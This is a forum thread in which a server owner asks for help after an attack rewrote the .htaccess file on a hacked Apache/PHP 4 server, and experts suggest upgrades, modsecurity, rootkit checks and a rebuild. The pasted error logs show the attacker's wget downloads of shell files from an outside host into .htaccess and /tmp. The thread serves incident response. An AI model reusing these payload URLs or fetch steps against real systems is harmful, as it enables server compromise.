Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
15
740 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to other ip: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what's the hole and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Open in new window

0
Comment
Question by:z_ruixiang
  • 7
  • 6
  • 2
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0
Efficient way to get backups off site to Azure

This user guide provides instructions on how to deploy and configure both a StoneFly Scale Out NAS Enterprise Cloud Drive virtual machine and Veeam Cloud Connect in the Microsoft Azure Cloud.

 

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 28

Accepted Solution

by:
Jan Springer earned 500 total points
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unkown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0

Featured Post

PRTG Network Monitor: Intuitive Network Monitoring

Network Monitoring is essential to ensure that computer systems and network devices are running. Use PRTG to monitor LANs, servers, websites, applications and devices, bandwidth, virtual environments, remote systems, IoT, and many more. PRTG is easy to set up & use.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

In this article, you will read about the trends across the human resources departments for the upcoming year. Some of them include improving employee experience, adopting new technologies, using HR software to its full extent, and integrating artifi…
I've been an avid user and supporter of Malwarebytes Premium Version 2.x for years. It's an excellent product that runs alongside just about any Anti-Virus application without issues. It seems to have an uncanny ability to pick up many things that A…
This video will demonstrate how to find the puppet warp tool from the edit menu and where to put the points to edit.
The viewer will learn how to successfully create a multiboot device using the SARDU utility on Windows 7. Start the SARDU utility: Change the image directory to wherever you store your ISOs, this will prevent you from having 2 copies of an ISO wit…

825 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question